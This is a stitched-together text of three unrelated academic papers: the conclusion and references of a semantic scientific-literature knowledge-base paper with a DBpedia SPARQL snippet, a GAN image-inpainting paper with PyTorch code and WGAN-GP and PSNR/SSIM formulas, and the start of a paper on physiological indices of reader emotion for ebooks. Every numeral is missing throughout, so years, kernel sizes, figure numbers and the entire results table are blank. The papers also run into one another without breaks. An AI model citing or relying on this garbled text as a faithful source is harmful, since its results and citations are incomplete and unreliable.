sepublica /paper- .xml: "in this paper we present two ontologies, i.e., biro and c o, that allow users to describe bibliographic references in an accurate way, and we introduce renhancer, a proof-of-concept implementation of a converter that takes as input a raw-text list of references and produces an rdf dataset according to the biro and c o ontologies."
sepublica /paper- .xml: "we propose to use the cito ontology for describing the rhetoric of the citations (in this way we can establish a network with other works)."

this simple example is a demonstration of how we can exploit the wealth of knowledge available in the lod cloud. of course, numerous other queries now become possible on scientific papers, by exploiting other linked open data sources.
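the service block in the expanded query above delegates the category lookup to the public dbpedia endpoint. as a small sketch of steps (i) and (ii) in isolation, the snippet below first retrieves the categories of the linked data resource and then the sibling subjects filed under the same categories; the resource iri follows the dbpedia:Linked_data example used in the text and may need to be adjusted for a concrete dbpedia version.

# sketch of steps (i) and (ii): find the dbpedia categories of a resource, then the
# other subjects filed under the same categories. the resource iri follows the
# document's dbpedia:Linked_data example; error handling and paging are omitted.
from SPARQLWrapper import SPARQLWrapper, JSON

DBPEDIA_ENDPOINT = "http://dbpedia.org/sparql"

def related_subjects(resource_iri):
    query = """
    select distinct ?subject
    where {
      <%s> <http://purl.org/dc/terms/subject> ?category .
      ?subject <http://purl.org/dc/terms/subject> ?category .
    }
    """ % resource_iri
    endpoint = SPARQLWrapper(DBPEDIA_ENDPOINT)
    endpoint.setQuery(query)
    endpoint.setReturnFormat(JSON)
    rows = endpoint.query().convert()["results"]["bindings"]
    return [row["subject"]["value"] for row in rows]

# subjects semantically related to linked data, e.g. other resources under the
# semantic web category; these iris can then be matched against the local knowledge base
for iri in related_subjects("http://dbpedia.org/resource/Linked_data"):
    print(iri)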
conclusion
we all need better ways to manage the overwhelming amount of scientific literature available to us. our approach is to create a semantic knowledge base that can supplement existing repositories, allowing users fine-grained access to documents based on querying lod entities and their occurrence in rhetorical zones. we argue that by combining the concepts of res and nes, enhanced retrieval of documents becomes possible, e.g., finding all contributions on a specific topic or comparing the similarity of papers based on their res. to demonstrate the feasibility of these ideas, we developed an nlp pipeline to fully automate the transformation of scientific documents from free-form content, read in isolation, into a queryable, semantic knowledge base.

in future work, we plan to further improve both the nlp analysis and the lod linking part of our approach. as our experiments showed, general-domain ne linking tools, like dbpedia spotlight, are biased toward popular terms, rather than scientific entities. here, we plan to investigate how we can adapt existing or develop new entity linking methods specifically for scientific literature. finally, to support end users not familiar with semantic query languages, we plan to explore user interfaces and interaction patterns, e.g., based on our zeeva semantic wiki (sateli & witte, ) system.

additional information and declarations
funding
this work was partially funded by an nserc discovery grant. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.
grant disclosures
the following grant information was disclosed by the authors: nserc discovery grant.
competing interests
the authors declare there are no competing interests.
author contributions
• bahar sateli and rené witte conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, and reviewed drafts of the paper.
data availability
the following information was supplied regarding data availability: http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements.

references
berners-lee t, hendler j. . publishing on the semantic web. nature ( ): – . doi . / .
blake c. . beyond genes, proteins, and abstracts: identifying scientific claims from full-text biomedical articles. journal of biomedical informatics ( ): – . doi . /j.jbi. . . .
bontcheva k, kieniewicz j, andrews s, wallis m. . semantic enrichment and search: a case study on environmental science literature. d-lib magazine ( ). doi . /january -bontcheva.
constantin a, peroni s, pettifer s, david s, vitali f. . the document components ontology (doco). the semantic web journal, in press. available at http://www.semantic-web-journal.net/system/files/swj .pdf.
cunningham h, maynard d, bontcheva k, tablan v. . gate: a framework and graphical development environment for robust nlp tools and applications. in: proceedings of the th anniversary meeting of the association for computational linguistics (acl).
cunningham h, maynard d, bontcheva k, tablan v, aswani n, roberts i, gorrell g, funk a, roberts a, damljanovic d, heitz t, greenwood ma, saggion h, petrak j, li y, peters w. . text processing with gate (version ). sheffield: gate.
daiber j, jakob m, hokamp c, mendes pn. . improving efficiency and accuracy in multilingual entity extraction. in: proceedings of the th international conference on semantic systems (i-semantics). available at http://jodaiber.github.io/doc/entity.pdf.
di iorio a, peroni s, vitali f. . towards markup support for full goddags and beyond: the earmark approach. in: proceedings of balisage: the markup conference. available at http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html.
groza t, handschuh s, möller k, decker s. a. salt: semantically annotated latex for scientific publications. in: the semantic web: research and applications, lncs. berlin, heidelberg: springer, – .
groza t, handschuh s, möller k, decker s. . konnexsalt: first steps towards a semantic claim federation infrastructure. in: bechhofer s, hauswirth m, hoffmann j, koubarakis m, eds. the semantic web: research and applications, lncs, vol. . berlin, heidelberg: springer, – .
groza t, möller k, handschuh s, trif d, decker s. b. salt: weaving the claim web. lecture notes in computer science, vol. . berlin, heidelberg: springer.
heath t, bizer c. . linked data: evolving the web into a global data space. synthesis lectures on the semantic web: theory and technology. san rafael: morgan & claypool publishers.
liakata m, saha s, dobnik s, batchelor cr, rebholz-schuhmann d. . automatic recognition of conceptualization zones in scientific articles and two life science applications. bioinformatics ( ): – . doi . /bioinformatics/bts .
liakata m, soldatova l. . guidelines for the annotation of general scientific concepts. technical report, aberystwyth university. jisc project report. available at http://ie-repository.jisc.ac.uk/ .
liakata m, teufel s, siddharthan a, batchelor cr. . corpora for the conceptualisation and zoning of scientific papers. in: international conference on language resources and evaluation (lrec). available at http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf.
malhotra a, younesi e, gurulingappa h, hofmann-apitius m. . 'hypothesisfinder:' a strategy for the detection of speculative statements in scientific text. plos computational biology ( ):e . doi . /journal.pcbi. .
mann wc, thompson s. . rhetorical structure theory: towards a functional theory of text organization. text ( ): – .
marcu d. . a decision-based approach to rhetorical parsing. in: proceedings of the th annual meeting of the association for computational linguistics on computational linguistics.
association for computational linguistics, – .
mendes pn, jakob m, garcía-silva a, bizer c. . dbpedia spotlight: shedding light on the web of documents. in: proceedings of the th international conference on semantic systems. new york: acm, – .
naak a, hage h, aimeur e. . papyres: a research paper management system. in: th ieee international conference on e-commerce technology (cec)/ th ieee international conference on enterprise computing, e-commerce and e-services (eee). piscataway: ieee, – .
peroni s. . semantic publishing: issues, solutions and new trends in scholarly publishing within the semantic web era. phd dissertation, university of bologna.
rupp c, copestake a, teufel s, waldron b. . flexible interfaces in the application of language technology to an escience corpus. in: proceedings of the uk e-science programme all hands meeting (ahm). available at http://www.allhands.org.uk/ /proceedings/papers/ .pdf.
sanderson r, bradshaw s, brickley d, castro ljg, clark t, cole t, desenne p, gerber a, isaac a, jett j, habing t, haslhofer b, hellmann s, hunter j, leeds r, magliozzi a, morris b, morris p, van ossenbruggen j, soiland-reyes s, smith j, whaley d. . open annotation data model. in: w c community draft. available at http://www.openannotation.org/spec/core/.
sateli b, witte r. . supporting researchers with a semantic literature management wiki. in: the th workshop on semantic publishing (sepublica), ceur workshop proceedings, vol. . crete: anissaras.
sateli b, witte r. . automatic construction of a semantic knowledge base from ceur workshop proceedings. in: semantic web evaluation challenges: semwebeval at eswc, portorož, slovenia, revised selected papers, communications in computer and information science, vol. . berlin, heidelberg: springer, – .
shotton d, portwin k, klyne g, miles a. . adventures in semantic publishing: exemplar semantic enhancements of a research article. plos computational biology ( ):e . doi . /journal.pcbi. .
soldatova ln, clare a, sparkes a, king rd. . an ontology for a robot scientist. bioinformatics ( ):e –e . doi . /bioinformatics/btl .
teufel s. . the structure of scientific articles: applications to citation indexing and summarization. stanford: center for the study of language and information.
teufel s, moens m. . summarizing scientific articles: experiments with relevance and rhetorical status. computational linguistics ( ): – . doi . / .
teufel s, siddharthan a, batchelor cr. . towards discipline-independent argumentative zoning: evidence from chemistry and computational linguistics. in: emnlp. stroudsburg: acl, – .
international journal of advanced network, monitoring and controls, volume , no. , doi: . /ijanmc- -

image inpainting research based on deep learning

zhao ruixia, school of computer science and engineering, xi'an technological university, xi'an, china, e-mail: @qq.com
zhao li, school of computer science and engineering, xi'an technological university, xi'an, china, e-mail: @qq.com

abstract—with the rapid development of computer technology, image inpainting has become a research hotspot in the field of deep learning. image inpainting lies at the intersection of computer vision and computer graphics and is an image processing technology between image editing and image generation.
the proposal of generative adversarial networks has effectively alleviated the problems of poor inpainting quality and of large differences between the inpainted image and the target image, and has promoted the development of image inpainting technology. in this paper, image inpainting is based on generative adversarial networks. the network structure establishes two repair paths, namely the reconstruction path and the generation path, and the two paths correspond to two groups of networks. the encoder and generator in the network respectively complete the encoding and decoding tasks based on the residual network. the discriminator uses a patch-based discriminator built on the residual network to judge the authenticity of the image. this paper uses the places data set to verify the algorithm and uses the two objective evaluation methods psnr and ssim to evaluate the quality of the repaired images. experiments show that the inpainting effect of the algorithm is good.

keywords—image inpainting; generative adversarial networks; residual network; patch

with the development and popularization of computer technology, internet technology and multimedia technology, digital image processing technology has also developed rapidly. in the process of storage, transmission and use of digital image information, image information can be damaged or lost. these damaged areas affect the visual quality of the picture and the integrity of the information, and have a certain impact on the application of the picture. a technology that can automatically inpaint damaged digital images is urgently needed, and so digital image inpainting technology was born.

i. introduction

image inpainting is one of the most popular areas of deep learning. its basic principle is, given an image with a damaged or corroded area, to use the intact information of the known area of the damaged image to inpaint the damaged area[ - ]. digital image inpainting methods can be divided into two major categories: traditional image inpainting methods and deep learning-based image inpainting methods. traditional methods can in turn be divided into structure-based image inpainting technology and texture-synthesis-based image inpainting technology. both structure-based and texture-based inpainting algorithms can repair the loss of small areas such as folds; as the missing area grows, the inpainting effect gradually deteriorates, and problems such as incomplete semantic information and blurred images appear in the results, so the inpainting effect is not ideal. the emergence of deep neural networks allows a model to obtain an understanding of image semantic information through multi-level feature extraction, and to a certain extent improves the repair of large damaged areas. as deep learning shows exciting prospects in the fields of image semantic inpainting and situational awareness, and deep learning-based inpainting algorithms can capture higher-level image features than traditional structure- and texture-based algorithms, they are now widely used for image inpainting. at present, image inpainting based on generative adversarial networks is a major research hotspot in the field of deep learning image inpainting, and it lays a solid foundation for the development of image inpainting technology.
a. the basic idea of generative adversarial networks

the generative adversarial network is one of the most popular artificial intelligence technologies and was rated among the "top ten global breakthrough technologies" by the mit technology review. a generative adversarial network is composed of a generative network and a discriminant network. the purpose of the generative network is to estimate the distribution of the data samples from a given noise input and to generate synthetic data. the purpose of the discriminant network is to distinguish whether its input is generated data or real data. the generative network and the discriminant network stand in an adversarial relationship. the source of this adversarial idea is the zero-sum game in game theory: the two sides of the game adapt their strategies to each other's in an equal game so as to achieve the goal of winning[ ]. extended to the generative adversarial network, the generative network and the discriminant network are the two sides of the game, and the optimization goal is to reach a nash equilibrium[ ]. the generative network tries to produce data ever closer to the real data; accordingly, the discriminant network tries to distinguish ever more accurately between real data and data produced by the generator. as a result, the two networks progress through confrontation and keep confronting each other after each improvement, and the data produced by the generative network becomes closer and closer to the real data.

b. development of deep learning models

since the input of the gan generative model is random noise data, practical applications usually need explicit variables that control the category or other properties of the data to be generated, such as generating a specific digit. in order to solve the problem of generating labeled data, conditional generative adversarial networks were proposed, in which information such as category labels and pictures is added to the input so that the generated image better matches the target[ ]. the foundation of deep learning-based image inpainting is the convolutional neural network, which is used to extract high-dimensional features and predict missing information, and it has made image inpainting technology develop rapidly[ - ]. because the generative and discriminant networks in the original gan are too simple, image blur appears when generating large images; in order to generate clear images, radford a et al.[ ] proposed deep convolutional generative adversarial networks. the emergence of several unsupervised image conversion models, such as cyclegan[ ], dualgan[ ] and discogan[ ], has provided further ideas for image inpainting technology.

ii. network structure

image inpainting not only requires that the results conform to human visual habits, making it difficult for the human eye to detect the traces of inpainting[ ], but should at the same time recover the information contained in the missing regions as far as possible, so that the restored image is as close as possible to the image before the damage. based on this restoration goal, this paper builds an image inpainting network framework by studying and analyzing the structural principles of gan.
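before describing the specific architecture, it helps to see the adversarial recipe in code. the fragment below is a deliberately minimal pytorch illustration of alternating discriminator and generator updates; the toy fully connected networks, the latent dimension, the learning rates and the binary cross-entropy objective are assumptions made only for the illustration and are not the networks or the loss actually used in this paper (which uses residual networks and the wgan-gp loss described below).

```python
import torch
import torch.nn as nn

# toy generator: maps a 64-d noise vector to a flat "image" vector
G = nn.Sequential(nn.Linear(64, 256), nn.ReLU(), nn.Linear(256, 784), nn.Tanh())
# toy discriminator: maps a flat image to a single real/fake score (logit)
D = nn.Sequential(nn.Linear(784, 256), nn.LeakyReLU(0.2), nn.Linear(256, 1))

opt_g = torch.optim.Adam(G.parameters(), lr=2e-4)
opt_d = torch.optim.Adam(D.parameters(), lr=2e-4)
bce = nn.BCEWithLogitsLoss()

def train_step(real_batch):
    batch = real_batch.size(0)
    real_label = torch.ones(batch, 1)
    fake_label = torch.zeros(batch, 1)

    # discriminator update: push real scores up, fake scores down
    z = torch.randn(batch, 64)
    fake = G(z).detach()                      # do not backprop into G here
    loss_d = bce(D(real_batch), real_label) + bce(D(fake), fake_label)
    opt_d.zero_grad()
    loss_d.backward()
    opt_d.step()

    # generator update: try to make the discriminator say "real"
    z = torch.randn(batch, 64)
    loss_g = bce(D(G(z)), real_label)
    opt_g.zero_grad()
    loss_g.backward()
    opt_g.step()
    return loss_d.item(), loss_g.item()

# example: one step on random stand-in data
print(train_step(torch.randn(16, 784)))
```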
using the neural network's ability to extract high-dimensional image features, the structural framework of this paper is built. a parallel dual-path framework based on gan is used: one path is the reconstruction path, which uses the given real image and the complement of the masked image to reconstruct the original image; the other is the generation path, which uses the given masked image for inpainting. the input image of the generation path and the input image of the reconstruction path are complementary images of each other. the network is built on the residual network and consists of three parts: the encoder, the generating network and the discriminating network. the image inpainting process in this paper is:

( ) input the masked image and its complement image (together they compose the real image) into the encoders e and e of the reconstruction path and the generation path for encoding;
( ) fuse the two extracted feature maps and feed them into the generators g and g ;
( ) input the image reconstructed by the generator and the real image into the discriminator d for discrimination;
( ) input the generated image, the fused image and the real image into the discriminator d for discrimination;
( ) the discriminators d and d output their results and feed them back to the encoder, generator and discriminator through the back-propagation algorithm to update the network parameters and train the network.

the overall structure of the network is shown in figure (data flow diagram of the gan, with the reconstruction and generation paths, encoders e and e , generators g and g , and discriminators d and d ).

a. encoder

the encoder extracts image features based on the residual network. the inputs of encoders e and e are three-channel images of × pixels. the residual block is composed of two convolution layers and one skip link: the first layer uses a convolution kernel of size × with a given stride and padding, and the second layer uses a × convolution kernel with a given stride and no padding. the residual structure of the encoder is shown in figure (a convolution branch plus an identity map of the input x, giving output f(x)+x). the two parallel inpainting paths, the reconstruction path and the generation path, use the same encoder structure, built as a combination of residual modules; the encoder network structure, a stack of residual modules from the damaged input image to the output image features, is shown in figure .
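a possible pytorch rendering of the encoder's residual blocks is sketched below. the exact kernel sizes, strides, channel widths, input resolution and number of stacked modules are not recoverable from the text above, so the 3×3 and 1×1 kernels, 64 feature channels, seven blocks and 256×256 input used here are illustrative assumptions only.

```python
import torch
import torch.nn as nn

class EncoderResBlock(nn.Module):
    """Residual block: two convolutions plus an identity skip connection.
    Kernel sizes, strides and padding are illustrative assumptions."""
    def __init__(self, channels):
        super().__init__()
        self.body = nn.Sequential(
            nn.Conv2d(channels, channels, kernel_size=3, stride=1, padding=1),
            nn.ReLU(inplace=True),
            nn.Conv2d(channels, channels, kernel_size=1, stride=1, padding=0),
        )

    def forward(self, x):
        # output is f(x) + x, as in the residual structure sketched above
        return torch.relu(self.body(x) + x)

class Encoder(nn.Module):
    """Stem that maps the three-channel input image to a feature map,
    followed by a stack of residual blocks (block count assumed)."""
    def __init__(self, in_channels=3, features=64, n_blocks=7):
        super().__init__()
        stem = [nn.Conv2d(in_channels, features, kernel_size=3, padding=1),
                nn.ReLU(inplace=True)]
        blocks = [EncoderResBlock(features) for _ in range(n_blocks)]
        self.net = nn.Sequential(*stem, *blocks)

    def forward(self, x):
        return self.net(x)

# example: encode one masked RGB image (256x256 resolution assumed)
feats = Encoder()(torch.randn(1, 3, 256, 256))
print(feats.shape)
```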
b. generating network

the generating network adopts a res-net structure and uses residual decoding blocks to decode the features extracted in the encoding stage. the residual block used in the decoding stage is composed of three parts: a convolution layer, a deconvolution layer and a skip-link layer. the convolution layer uses a convolution kernel of size × with a given stride and padding. the deconvolution layer uses a × convolution kernel with a given stride and padding; after the deconvolution operation the output image has the stated padding. the skip-link layer also performs a deconvolution operation, using a convolution kernel of size × with a given stride and padding. the generating network uses spectral normalization to normalize the output data. the network structure of the residual block in the decoding stage is shown in figure (a convolution branch and a deconvolution branch joined at the output). a self-attention mechanism has been added to the network; it is built on residual blocks and combines short- and long-term dependencies to ensure the consistency of the appearance of the generated image. the structure of the generating network, a stack of residual modules, decoding residual modules and the self-attention mechanism producing the generated image from the input image features, is shown in figure .

c. discriminating network

the discriminating network adopts the patchgan structure. the difference between patchgan and an ordinary gan discriminator is that an ordinary gan outputs a single evaluation of the entire image, whereas patchgan outputs an n×n matrix in which each element corresponds to a larger receptive field in the original image, i.e., to a patch of the original picture. this paper runs a patch discriminator over the image in a convolutional manner. the discriminator outputs a patch block of × size, and each element represents the probability that the corresponding patch is real. the input of the discriminating network is a picture; the target picture is used as a positive example and the inpainted picture as a negative example, so as to judge whether the inpainted picture is real. the discriminators d and d in this paper have the same network structure and use five convolution layers: the first three layers use a × convolution kernel with a given stride and padding, and the last two layers use a × convolution kernel with a given stride and padding. the discriminating network first extracts the features of the input image and then analyzes and compares the extracted features. the structure of the discriminating network, five convolution layers mapping the generated or real image to a probability map, is shown in figure .
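the patch-style discriminator described above can be sketched compactly in pytorch. because the concrete kernel sizes, strides and channel widths are elided in the text, the 4×4 kernels, stride-2 downsampling in the first three layers and the channel progression used below are assumptions in the spirit of common patchgan implementations, not the exact network of this paper.

```python
import torch
import torch.nn as nn

class PatchDiscriminator(nn.Module):
    """Five-layer convolutional discriminator in the PatchGAN style:
    instead of one real/fake score it returns an N x N map, each element
    scoring one patch (receptive field) of the input image.
    Kernel sizes, strides and channel widths are illustrative assumptions."""
    def __init__(self, in_channels=3, base=64):
        super().__init__()
        layers = []
        channels = [in_channels, base, base * 2, base * 4]
        # first three layers: downsampling convolutions
        for c_in, c_out in zip(channels[:-1], channels[1:]):
            layers += [nn.Conv2d(c_in, c_out, kernel_size=4, stride=2, padding=1),
                       nn.LeakyReLU(0.2, inplace=True)]
        # last two layers: keep resolution, reduce to a one-channel patch map
        layers += [nn.Conv2d(base * 4, base * 8, kernel_size=4, stride=1, padding=1),
                   nn.LeakyReLU(0.2, inplace=True),
                   nn.Conv2d(base * 8, 1, kernel_size=4, stride=1, padding=1)]
        self.net = nn.Sequential(*layers)

    def forward(self, x):
        # raw scores; apply torch.sigmoid for per-patch probabilities
        return self.net(x)

# example: a 256x256 image yields a coarse patch score map
scores = PatchDiscriminator()(torch.randn(1, 3, 256, 256))
print(scores.shape)  # e.g. torch.Size([1, 1, 30, 30])
```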
iii. network training

in this paper, the wgan-gp loss is used to optimize the network structure. wgan-gp is an improvement of wgan in which a gradient penalty is proposed to enforce the continuity constraint, making gan convergence more stable. the loss function of wgan-gp is composed of the loss $l_g$ of the generator and the loss $l_d$ of the discriminator, which can be written as

$$l_g = -\mathbb{E}_{z}\big[d\big(g(z)\big)\big]$$

$$l_d = l_d^{\mathrm{wgan}} + l_{gp} = \mathbb{E}_{z}\big[d\big(g(z)\big)\big] - \mathbb{E}_{x}\big[d(x)\big] + \lambda\,\mathbb{E}_{\hat{x}}\big[\big(\lVert\nabla_{\hat{x}}\, d(\hat{x})\rVert_2 - 1\big)^2\big]$$

where x represents a randomly selected sample from the data set, d(x) represents the output of the discriminant model when its input is a real sample, g(z) is the sample produced by the generator from the noise z, $l_d^{\mathrm{wgan}}$ represents the loss function of the original wgan discriminator, $l_{gp}$ represents the gradient penalty term newly added in wgan-gp (evaluated at interpolates $\hat{x}$ between real and generated samples), and $\lambda$ represents the penalty coefficient.
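a minimal pytorch sketch of these two loss terms is given below. the interpolation scheme and the value of the penalty coefficient follow the generic wgan-gp formulation; the paper's own (elided) settings are not recoverable, so treat the defaults here as assumptions, and the trivial discriminator in the usage example is a stand-in.

```python
import torch

def gradient_penalty(D, real, fake, lam=10.0):
    """Gradient penalty term L_gp of WGAN-GP, evaluated on random
    interpolations between real and generated image batches (N, C, H, W)."""
    eps = torch.rand(real.size(0), 1, 1, 1, device=real.device)
    x_hat = (eps * real + (1.0 - eps) * fake).requires_grad_(True)
    d_hat = D(x_hat)
    grads = torch.autograd.grad(outputs=d_hat, inputs=x_hat,
                                grad_outputs=torch.ones_like(d_hat),
                                create_graph=True, retain_graph=True)[0]
    grad_norm = grads.view(grads.size(0), -1).norm(2, dim=1)
    return lam * ((grad_norm - 1.0) ** 2).mean()

def wgan_gp_losses(D, real, fake):
    """Discriminator loss L_D = E[D(G(z))] - E[D(x)] + L_gp and
    generator loss L_G = -E[D(G(z))], matching the formulas above."""
    loss_d = D(fake.detach()).mean() - D(real).mean() + gradient_penalty(D, real, fake.detach())
    loss_g = -D(fake).mean()
    return loss_d, loss_g

# example with stand-in tensors and a trivial "discriminator"
if __name__ == "__main__":
    D = torch.nn.Sequential(torch.nn.Flatten(), torch.nn.Linear(3 * 8 * 8, 1))
    real, fake = torch.randn(4, 3, 8, 8), torch.randn(4, 3, 8, 8)
    ld, lg = wgan_gp_losses(D, real, fake)
    print(ld.item(), lg.item())
```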
iv. experimental results and analysis

a. experimental environment

in order to verify the effectiveness of the proposed algorithm, the experiments are run on the ubuntu platform using the python language and the pytorch deep learning framework, with images from the public places data set. the image size is × pixels, and a ratio of : is used to split the data into training and test sets.

b. experimental results

since the image inpainting task is to repair the incomplete part of an image, the data set is mask-processed before the inpainting task. in this paper, the image preprocessing uses two kinds of masks: random masks and center (intermediate) masks. after the data processing is completed, the image inpainting task is performed. the inpainting result for the center mask is shown in figure , and the inpainting result for the random mask is shown in figure ; in both figures, (a) is the damaged image, (b) is the inpainted image and (c) is the real image.

c. experimental analysis

at this stage there are mainly two kinds of image evaluation methods: subjective evaluation and objective evaluation. this article combines both to evaluate the repaired images.

) subjective evaluation. from the experimental results it can be seen that the content of the images inpainted by this method is basically the same as the target images, the color is very similar to the target images, direct visual observation of the images looks real and natural, and the inpainted texture is natural and continuous.

) objective evaluation. the objective evaluation uses the peak signal-to-noise ratio (psnr) and the structural similarity (ssim) to evaluate the repaired images. the higher the psnr, the less distortion is introduced in the inpainting process and the better the inpainted picture. ssim measures the similarity of two images; a higher value indicates that the two images are more similar, and its maximum value is . the peak signal-to-noise ratio is defined as

$$\mathrm{psnr} = 10\,\log_{10}\!\left(\frac{l^2}{\mathrm{mse}}\right), \qquad \mathrm{mse} = \frac{1}{m\,n}\sum_{i=1}^{m}\sum_{j=1}^{n}\big(i(i,j) - \hat{i}(i,j)\big)^2$$

where mse is the mean squared error, i(i,j) represents the pixel value at (i,j) in the real image, $\hat{i}(i,j)$ represents the pixel value at (i,j) in the inpainted image, m × n represents the size of the inpainted image, and l is the dynamic range of the pixel values (the maximum possible pixel value). the structural similarity can be written as

$$\mathrm{ssim}(x,y) = \frac{\big(2\mu_x\mu_y + c_1\big)\big(2\sigma_{xy} + c_2\big)}{\big(\mu_x^2 + \mu_y^2 + c_1\big)\big(\sigma_x^2 + \sigma_y^2 + c_2\big)}$$

where x and y represent the two input images, $\mu_x$ is the mean of x, $\mu_y$ is the mean of y, $\sigma_x^2$ is the variance of x, $\sigma_y^2$ is the variance of y, $\sigma_{xy}$ is the covariance of x and y, and c and c are constants used to keep the division stable.

this paper compares four other image inpainting models with the proposed one, using the psnr and ssim methods for evaluation.

figure . inpainting result of intermediate masked ((a) damaged image, (b) inpainting image, (c) real image)
figure . inpainting result of random masked ((a) damaged image, (b) inpainting image, (c) real image)

table i. evaluation results of psnr and ssim methods
image inpainting model   psnr   ssim
ce[ ]                    .      .
gl[ ]                    .      .
gntipt[ ]                .      .
gmcnn[ ]                 .      .
ours                     .      .

v. conclusion and prospects

in this paper, an image inpainting network structure is built based on gan. the residual network is used in the encoding and decoding process to reduce the gradient vanishing and gradient explosion problems. the wgan-gp loss function is used to update the network parameters when inpainting the image, which improves not only the structural similarity of the inpainted image but also the matching degree of the image texture. the places dataset is used for network training and testing. the subjective evaluation method and the objective evaluation method are used to evaluate the inpainted images; the objective evaluation selects ssim and psnr. the comparison between this image inpainting model and the inpainting models of other papers verifies the effectiveness of the proposed algorithm.

references
[ ] bertalmio m, sapiro g, caselles v, et al. image inpainting[c]. international conference on computer graphics and interactive techniques, : - .
[ ] guillemot c, meur o l. image inpainting: overview and recent advances[j]. ieee signal processing magazine, , ( ): - .
[ ] goodfellow i, pouget-abadie j, mirza m, et al. generative adversarial nets[c]//advances in neural information processing systems. : - .
[ ] ratliff l j, burden s a, sastry s, et al. characterization and computation of local nash equilibria in continuous games[c]. allerton conference on communication, control, and computing, : - .
[ ] mirza m, osindero s. conditional generative adversarial nets[j]. computer science, : - .
[ ] pathak d, krahenbuhl p, donahue j, et al. context encoders: feature learning by inpainting[c]. computer vision and pattern recognition, : - .
[ ] yang c, lu x, lin z, et al. high-resolution image inpainting using multi-scale neural patch synthesis[c]. computer vision and pattern recognition, : - .
[ ] radford a, metz l, chintala s, et al. unsupervised representation learning with deep convolutional generative adversarial networks[j]. arxiv: learning, .
[ ] zhu j, park t, isola p, et al. unpaired image-to-image translation using cycle-consistent adversarial networks[c]. international conference on computer vision, : - .
[ ] kim t, cha m, kim h, et al. learning to discover cross-domain relations with generative adversarial networks[j]. arxiv: computer vision and pattern recognition, .
[ ] yi z, zhang h, tan p, et al. dualgan: unsupervised dual learning for image-to-image translation[c]. international conference on computer vision, : - .
[ ] efros a a, freeman w t. image quilting for texture synthesis and transfer[c]. international conference on computer graphics and interactive techniques, : - .
[ ] pathak d, krahenbuhl p, donahue j, et al. context encoders: feature learning by inpainting[c]. computer vision and pattern recognition, : - .
[ ] iizuka s, simoserra e, ishikawa h, et al.
globally and locally consistent image completion[j]. acm transactions on graphics, , ( ). [ ] yu j, lin z, yang j, et al. generative image inpainting with contextual attention[c]. computer vision and pattern recognition, : - . [ ] wang y, tao x, qi x, et al. image inpainting via generative multi-column convolutional neural networks[c]. neural information processing systems, : - . submitted october accepted april published may corresponding author jan b.f. van erp, jan.vanerp@tno.nl academic editor sally jo cunningham additional information and declarations can be found on page doi . /peerj-cs. copyright van erp et al. distributed under creative commons cc-by . open access toward physiological indices of emotional state driving future ebook interactivity jan b.f. van erp , , maarten a. hogervorst and ysbrand d. van der werf perceptual and cognitive systems, tno, soesterberg, the netherlands human media interaction, university of twente, enschede, the netherlands anatomy & neurosciences, vu university medical center, amsterdam, the netherlands abstract ebooks of the future may respond to the emotional experience of the reader. (neuro-) physiological measures could capture a reader’s emotional state and use this to enhance the reading experience by adding matching sounds or to change the storyline therewith creating a hybrid art form in between literature and gaming. we describe the theoretical foundation of the emotional and creative brain and review the neurophysiological indices that can be used to drive future ebook interactivity in a real life situation. as a case study, we report the neurophysiological measurements of a bestselling author during nine days of writing which can potentially be used later to compare them to those of the readers. in designated calibration blocks, the artist wrote emotional paragraphs for emotional (iaps) pictures. analyses showed that we can reliably distinguish writing blocks from resting but we found no reliable differences related to the emotional content of the writing. the study shows that measurements of eeg, heart rate (variability), skin conductance, facial expression and subjective ratings can be done over several hours a day and for several days in a row. in follow-up phases, we will measure readers with a similar setup. subjects human–computer interaction, brain–computer interface, multimedia keywords creativity, reading, emotion, neurophysiology, brain–computer interfaces, ebook, interactivity, eeg, multimedia, human–computer interaction introduction the sales of ebooks are rapidly increasing and are expected to surpass that of printed books in the near future. in its basic form, an ebook is an electronic version of the printed book. however, the devices used to access an ebook (ereader, tablet, etc.) have more capabilities than just displaying the book and turning pages on request of the reader. the device may enable true bidirectional interaction with the reader, which is a significant innovation compared to the one-directional printed book. this interactivity may substantially change the future of the ebook as artistic form and may result in new interactive media products that only slightly resemble the basic version of the printed book as sold today. together with scientific and cultural organizations we have started to explore the potential of interactive ebooks. one of the key questions is which reader parameter or actions (other than turning pages) are useful for interactive ebooks. 
one of the driving forces behind this exploration was the prominent dutch writer arnon grunberg who also had a genuine interest in what his readers actually experience while reading his work, or how to cite this article van erp et al. ( ), toward physiological indices of emotional state driving future ebook interactivity. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:jan.vanerp@tno.nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. more generally stated: ‘‘is reading a novel good for you?’’ (the writer himself takes a devil’s advocate stance and postulates the possibility that reading literature has a detrimental influence (grunberg, )). from neuroscientific data, we know that reading is a complex task involving many brain areas (he et al. ( ), see carreiras et al. ( ) for a recent review and nijhof & willems, ( ) for individual differences in narrative comprehension) and that reading can (at least temporarily) alter connectivity in an individual’s brain (dehaene et al., ; berns et al., ). however, just reading text doesn’t make one more social or empathetic. this may only happen after so-called ‘‘emotional transportation’’ (bal & veltkamp, ; johnson, ), i.e., as a reader one needs to be involved at an emotional level. it is postulated that there are no effects of reading non-fiction and also no effects of reading fiction when there is no emotional transportation (kidd & castano, ). a similar concept (immersion) is used in the ‘‘fiction feeling hypothesis’’ (hsu, conrad & jacobs, ) which postulates that negative, high arousal text activates the affective empathic network (walter, ) which facilitates immersion in the text. in an experiment, participants read neutral and fearful sections of the harry potter saga and the results indeed showed a relation between neuronal activation pattern and subjectively rated immersion. emotional experience is not only an essential catalyst, but also important in choosing which book to read, experiencing the content (johansen, ) and interpreting the narrative (mar et al., ). all the above led us to develop a research project to measure readers’ emotions while reading an ebook. emotional state can be a key parameter to drive interactivity in future ebooks and may be viable in a real-life situation using recent brain–computer interface (bci) technology. in addition, we were interested in measuring the emotions of the writer during the writing process to be able to compare the reader’s emotional state while reading a certain paragraph to that of the author during writing that same paragraph. capturing the emotional state of the writer (both through neurophysiology and subjective ratings) became our case study and is reported in this paper to illustrate the use of sensor technology and to investigate whether prolonged 